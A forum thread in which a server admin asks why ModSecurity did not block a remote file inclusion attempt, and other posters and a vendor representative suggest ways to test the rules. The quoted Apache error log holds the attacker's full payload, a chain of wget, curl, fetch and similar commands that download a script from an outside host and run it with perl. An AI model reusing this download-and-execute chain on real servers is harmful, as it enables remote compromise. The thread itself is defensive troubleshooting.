Seems like Mod Security (in ASL) doesnt stop remote file includes.

Now I know that this attack was not successful as the php options the script uses are disabled, as well as wget, GET, lwp-* and all that jazz so he was unable to download the script anyways.

But isnt Mod Sec supposed to catch these?

[Mon Oct 29 14:32:14 2007] [error] [client 201.8.172.106] PHP Fatal error: require() [<a href='function.require'>function.require</a>]: Failed opening required 'http://www.chamala.kit.net/tool25.txt?&amp;cmd=cd%20/tmp;rm%20bn.txt;wget%20http://garyz.110mb.com/bn.txt;fetch%20http://garyz.110mb.com/bn.txt;lwp-download%20http://garyz.110mb.com/bn.txt;curl%20-O%20http://garyz.110mb.com/bn.txt;lynx%20http://garyz.110mb.com/bn.txt;perl%20bn.txt' (include_path='.::.')

lol I tried to post the full web log and the server "shunned" me.

In any event the request returned a status of 200 (success) and was not stopped by mod sec

There are ways of getting under the mod_sec radar. That may be the case for this particular issue.

Normally if you were to put http://anything as an argument in an URL on your server, mod_security would block it. If it isn't doing so then you need to check mod_security is actually running.

e.g. http://www.domain-on-your-server/index.php

and right after that last php you add ?blah=

and then after that http://

and then after that blah.com

(sorry - don't wan't Scott's mod_sec blocking me)

You should get mod_sec triggering

Its the first thing I do when upgrading/changing.

Also try some of the other rules, like the blogspot one in blacklists.conf


Faris.

Thanks, but Yes - mod sec has been running the entire time, I do know that for a fact as I get the alerts from ossec from the audit logs

There are a couple of new rule classes in the -4 mod_sec release in atomic-testing that get a lot deeper into that type of input validation. The best way to get these tracked is to send them to support@atomicorp.com, so we can get a case started on it. Plus as you've noticed, this server has a super strict modsec policy (its actually where we do all the new rule testing) and emailing it to support wont shun you like posting to the forums will.